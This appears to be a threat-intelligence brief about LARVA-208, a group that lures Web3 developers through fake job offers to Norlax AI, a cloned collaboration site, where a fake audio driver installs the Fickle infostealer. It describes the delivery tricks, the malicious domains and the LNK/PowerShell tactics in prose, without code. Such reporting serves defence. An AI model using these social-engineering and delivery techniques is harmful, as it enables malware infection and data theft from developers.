LARVA-208, a threat group previously known for phishing IT staff via phone calls and emails, has launched a targeted campaign aimed at Web3 developers.

This operation goes beyond traditional email lures or malicious attachments and uses a convincing fake collaboration platform to trick victims into installing malware themselves.

The campaign revolves around Norlax AI, a copy of the legitimate AI workspace platform Teampilot.ai.

Developers are contacted with job offers or project invitations, then directed to Norlax to join a meeting. Once logged in, victims are prompted to resolve a fake audio issue by downloading an “audio driver.” The installer delivers Fickle, an infostealer that quietly exfiltrates sensitive system and user data.

This campaign is not technically elaborate in its payload, but it is highly effective in how the payload is delivered. LARVA-208 uses tools and environments developers are already familiar with and introduces malware through scenarios that seem routine and plausible.

Why It Matters: Developers in the Web3 space often maintain direct control over private keys, smart contracts, and deployment infrastructure, frequently without the protection of centralized IT policies. LARVA-208 exploits this by embedding malware into realistic workflows, such as job interviews and platform demos, delivered through convincingly cloned services. These interactions bypass common detection methods and rely on behavioral trust, placing sensitive systems within reach of well-prepared adversaries.

• Norlax AI is a Functional Clone of a Legitimate Platform: The fake site norlax.ai is nearly identical to teampilot.ai in appearance and behavior. Victims are given unique invitation codes and login credentials by the attacker, adding to the illusion of exclusivity and authenticity. The interaction feels legitimate enough to lower suspicion.

• Audio Error Prompt Delivers Malware: Once the victim logs in, they are told that their audio drivers are outdated or missing. A prompt links to audiorealtek.com, where a supposed Realtek HD Audio Driver can be downloaded. The installer looks legitimate but hides a PowerShell command inside a DLL file. When run, it retrieves the Fickle stealer from a C2 domain and installs it silently.

• Fickle Steals Detailed Host and Network Information: The malware collects system metadata, including device name, OS version, CPU architecture, installed programs, language settings, username, running processes, and IP-based location data. This information is sent to attacker-controlled servers, where it is indexed under a system referred to as SilentPrism.

• Victims Are Recruited Through Developer-Focused Channels: LARVA-208 reaches out on platforms such as X, Telegram, and Remote3. In some cases, the attackers post fake job listings. Interviews often begin over Google Meet, which builds trust. Later, the attacker shifts the session to Norlax to deliver the payload. This approach bypasses Remote3’s built-in safety recommendations and avoids detection by using real-time communication to stage the attack.

• Infrastructure Tied to Luminous Mantis via Bulletproof Hosting: The campaign uses several domains registered through FFv2, a bulletproof hosting provider linked to Luminous Mantis. These overlaps in hosting and domain registration practices suggest shared tooling or operational alignment between LARVA-208 and Luminous Mantis.

• Older Tactics Still in Use Alongside Platform Impersonation: In parallel with the Norlax delivery method, LARVA-208 has also continued to deploy .LNK files containing PowerShell payloads. These files reference legitimate Windows scripts, appending malicious commands via the ampersand operator. The payloads connect to the group’s servers, download Fickle, and execute it.

Go Deeper -> LARVA-208’s New Campaign Targets Web3 Developers – CATALYST